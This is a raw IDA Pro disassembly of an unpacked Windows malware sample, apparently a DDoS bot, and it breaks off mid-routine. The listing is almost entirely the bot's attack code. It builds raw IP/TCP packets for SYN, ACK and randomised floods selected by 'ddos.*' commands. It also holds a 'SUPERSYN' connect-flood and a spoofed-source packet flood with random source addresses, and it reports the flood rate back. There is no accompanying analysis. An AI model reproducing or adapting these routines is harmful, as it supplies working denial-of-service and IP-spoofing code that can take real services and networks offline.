;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BC527FAC670BFBD1977373821A8280F6
; File Name : u:\work\bc527fac670bfbd1977373821a8280f6_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00022174 ( 139636.)
; Section size in file : 00022174 ( 139636.)
; Offset to raw data for section: 00001000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_0 segment para public 'CODE' use32
assume cs:_0
;org 401000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; DATA XREF: sub_40EE72+3A15�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4013EC
add esp, 14h
push eax
lea eax, [ebp+var_494]
push offset unk_426050
push eax
call sub_4172AE
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_401093
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_40D679
add esp, 14h
loc_401093: ; CODE XREF: sub_401000+71�j
lea eax, [ebp+var_494]
push eax
call sub_40BF6D
push [ebp+var_290]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_401000 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B5 proc near ; CODE XREF: sub_4013EC+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_43F5E0 ; WSAStartup
test eax, eax
jz short loc_4010F5
xor eax, eax
jmp loc_4013E8
; ---------------------------------------------------------------------------
loc_4010F5: ; CODE XREF: sub_4010B5+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_43F70C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4013E0
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call ds:dword_43F648 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4013D6
push [ebp+arg_C]
mov [ebp+var_58], 2
call ds:dword_43F668 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call ds:dword_43F668 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call ds:dword_43F668 ; htons
mov [ebp+var_12], ax
call sub_41730A
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_43F668 ; htons
push 12345678h
mov [ebp+var_14], ax
call ds:dword_43F664 ; htonl
push offset aDdos_syn ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4011C5
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_401219
; ---------------------------------------------------------------------------
loc_4011C5: ; CODE XREF: sub_4010B5+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4011E1
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_401219
; ---------------------------------------------------------------------------
loc_4011E1: ; CODE XREF: sub_4010B5+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_401219
call sub_41730A
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_41730A
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_401219: ; CODE XREF: sub_4010B5+10E�j
; sub_4010B5+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call ds:dword_43F668 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call ds:dword_424060 ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_42405C ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_417760
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_401267: ; CODE XREF: sub_4010B5+2E2�j
; sub_4010B5+2F0�j
mov [ebp+var_4], bx
call sub_41730A
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_43F668 ; htons
mov [ebp+var_14], ax
call sub_41730A
mov edi, eax
shl edi, 10h
call sub_41730A
or edi, eax
push edi
call ds:dword_43F668 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_43F664 ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_43F668 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_417390
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AF39
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_417330
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AF39
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call ds:dword_43F6CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4013AA
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_42405C ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4013D3
jl loc_401267
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4013D3
jmp loc_401267
; ---------------------------------------------------------------------------
loc_4013AA: ; CODE XREF: sub_4010B5+2CB�j
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset unk_426088
push eax
call sub_4172AE
lea eax, [ebp+var_F4]
push eax
call sub_40BF6D
add esp, 10h
jmp short loc_4013D6
; ---------------------------------------------------------------------------
loc_4013D3: ; CODE XREF: sub_4010B5+2E0�j
; sub_4010B5+2EE�j
mov ebx, [ebp+arg_8]
loc_4013D6: ; CODE XREF: sub_4010B5+78�j
; sub_4010B5+31C�j
push [ebp+var_20]
call ds:dword_43F700 ; closesocket
pop esi
loc_4013E0: ; CODE XREF: sub_4010B5+5B�j
call ds:dword_43F5C8 ; WSACleanup
mov eax, ebx
loc_4013E8: ; CODE XREF: sub_4010B5+3B�j
pop edi
pop ebx
leave
retn
sub_4010B5 endp
; =============== S U B R O U T I N E =======================================
sub_4013EC proc near ; CODE XREF: sub_401000+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40ADCA
push [esp+10h+arg_4]
mov esi, eax
call sub_41781F
push [esp+14h+arg_C]
mov ebx, eax
call sub_41781F
mov edi, eax
call sub_41730A
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4010B5
add esp, 20h
test eax, eax
jnz short loc_40143B
push 1
pop eax
loc_40143B: ; CODE XREF: sub_4013EC+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4013EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40144A proc near ; DATA XREF: sub_40EE72+3C03�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call ds:dword_43F6E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4014E5
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
loc_401493: ; DATA XREF: _2:off_4282AC�o
push offset unk_426214
push eax
call sub_4172AE
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_4014C8
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_4014C8: ; CODE XREF: sub_40144A+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417076
pop ecx
pop ecx
push edi
call ds:dword_424054 ; ExitThread
loc_4014E5: ; CODE XREF: sub_40144A+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call ds:dword_43F648 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40155C
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_4261CC
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_40153F
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_40153F: ; CODE XREF: sub_40144A+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417076
pop ecx
pop ecx
push edi
call ds:dword_424054 ; ExitThread
loc_40155C: ; CODE XREF: sub_40144A+B3�j
lea eax, [ebp+var_1B8]
push eax
call ds:dword_43F6A8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4015C3
lea eax, [ebp+var_3BC]
push offset unk_42619C
push eax
call sub_4172AE
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_4015A6
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_4015A6: ; CODE XREF: sub_40144A+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417076
pop ecx
pop ecx
push edi
call ds:dword_424054 ; ExitThread
loc_4015C3: ; CODE XREF: sub_40144A+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call ds:dword_43F668 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call ds:dword_43F6A8 ; inet_addr
mov esi, ds:dword_424058
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_401601: ; CODE XREF: sub_40144A+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_4017AC
push 41Ch
mov ds:byte_43C3E8, 45h
call ds:dword_43F668 ; htons
cmp [ebp+var_2C], edi
mov ds:word_43C3EA, ax
mov ds:word_43C3EC, bx
mov ds:word_43C3EE, di
mov ds:byte_43C3F0, 80h
mov ds:byte_43C3F1, bl
mov ds:word_43C3F2, di
jz short loc_401687
call sub_41730A
mov ebx, eax
shl ebx, 8
call sub_41730A
add ebx, eax
shl ebx, 8
call sub_41730A
add ebx, eax
shl ebx, 8
call sub_41730A
add ebx, eax
push 1
mov ds:dword_43C3F4, ebx
pop ebx
jmp short loc_40169F
; ---------------------------------------------------------------------------
loc_401687: ; CODE XREF: sub_40144A+20B�j
push [ebp+var_1BC]
call sub_40AEE0
pop ecx
push eax
call ds:dword_43F6A8 ; inet_addr
mov ds:dword_43C3F4, eax
loc_40169F: ; CODE XREF: sub_40144A+23B�j
mov eax, [ebp+var_18]
mov ds:dword_43C3F8, eax
call sub_41730A
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_43C3FC, dl
call sub_41730A
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_43C3FD, dl
call sub_41730A
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov ds:word_43C3FE, di
mov ds:word_43C402, bx
inc edx
mov ds:word_43C400, dx
call sub_41730A
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_43C404
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_43C3E8
push [ebp+var_4]
call ds:dword_43F6CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401737
inc [ebp+arg_0]
jmp loc_401601
; ---------------------------------------------------------------------------
loc_401737: ; CODE XREF: sub_40144A+2E3�j
push [ebp+var_4]
call ds:dword_43F700 ; closesocket
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset unk_42613C
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41782A
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_40178F
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_40178F: ; CODE XREF: sub_40144A+323�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417076
pop ecx
pop ecx
push edi
call ds:dword_424054 ; ExitThread
loc_4017AC: ; CODE XREF: sub_40144A+1C8�j
push [ebp+var_4]
call ds:dword_43F700 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset unk_4260DC
push eax
call sub_4172AE
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_401814
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40D679
add esp, 14h
loc_401814: ; CODE XREF: sub_40144A+3A8�j
lea eax, [ebp+var_3BC]
push eax
call sub_40BF6D
push [ebp+var_38]
call sub_417076
pop ecx
pop ecx
push edi
call ds:dword_424054 ; ExitThread
sub_40144A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401831 proc near ; DATA XREF: sub_40EE72+159D�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401992
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset aSupersynDoneWi ; "[SUPERSYN]: Done with flood (%iKB/sec)"
push eax
call sub_4172AE
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4018B1
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40D679
add esp, 14h
loc_4018B1: ; CODE XREF: sub_401831+5E�j
lea eax, [ebp+var_414]
push eax
call sub_40BF6D
push [ebp+var_10]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_401831 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018D0 proc near ; CODE XREF: sub_401992+27�p
var_654 = byte ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call ds:dword_43F668 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_40198E
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_40191B: ; CODE XREF: sub_4018D0+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_401923: ; CODE XREF: sub_4018D0+7A�j
push 0
push 1
push 2
call ds:dword_424214 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_401946
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_424218 ; ioctlsocket
loc_401946: ; CODE XREF: sub_4018D0+64�j
add esi, 4
dec ebx
jnz short loc_401923
lea esi, [ebp+var_654]
mov ebx, edi
loc_401954: ; CODE XREF: sub_4018D0+96�j
lea eax, [ebp+var_14]
push 10h
push eax
push dword ptr [esi]
call ds:dword_42421C ; connect
add esi, 4
dec ebx
jnz short loc_401954
push 64h
call ds:dword_424064 ; Sleep
lea esi, [ebp+var_654]
mov ebx, edi
loc_401978: ; CODE XREF: sub_4018D0+B4�j
push dword ptr [esi]
call ds:dword_424220 ; closesocket
add esi, 4
dec ebx
jnz short loc_401978
dec [ebp+arg_4]
jnz short loc_40191B
pop edi
pop esi
pop ebx
loc_40198E: ; CODE XREF: sub_4018D0+3E�j
xor eax, eax
leave
retn
sub_4018D0 endp
; =============== S U B R O U T I N E =======================================
sub_401992 proc near ; CODE XREF: sub_401831+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40ADCA
push [esp+10h+arg_4]
mov edi, eax
call sub_41781F
push [esp+14h+arg_8]
mov ebx, eax
call sub_41781F
mov esi, eax
push esi
push ebx
push edi
call sub_4018D0
add esp, 18h
test eax, eax
jnz short loc_4019C8
push 1
pop eax
loc_4019C8: ; CODE XREF: sub_401992+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_401992 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019D7 proc near ; DATA XREF: sub_40EE72+3906�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401D28
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset dword_426280
push eax
call sub_4172AE
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_401A57
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40D679
add esp, 14h
loc_401A57: ; CODE XREF: sub_4019D7+5E�j
lea eax, [ebp+var_414]
push eax
call sub_40BF6D
push [ebp+var_10]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_4019D7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A76 proc near ; CODE XREF: sub_401D28+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_43F5E0 ; WSAStartup
test eax, eax
jz short loc_401AB6
xor eax, eax
jmp loc_401D24
; ---------------------------------------------------------------------------
loc_401AB6: ; CODE XREF: sub_401A76+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_43F70C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_401D1C
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call ds:dword_43F648 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_401D12
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call ds:dword_43F668 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call ds:dword_43F668 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call ds:dword_43F668 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call ds:dword_43F668 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_424060 ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_42405C ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_417760
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_401BA1: ; CODE XREF: sub_401A76+25D�j
; sub_401A76+26B�j
mov [ebp+var_24], bx
call sub_41730A
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_43F668 ; htons
mov [ebp+var_34], ax
call sub_41730A
mov edi, eax
shl edi, 10h
call sub_41730A
or edi, eax
push edi
call ds:dword_43F668 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_43F664 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_43F668 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_417390
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AF39
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_417330
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AF39
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417390
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call ds:dword_43F6CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401CE6
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_42405C ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_401D0F
jl loc_401BA1
mov eax, [ebp+var_8]
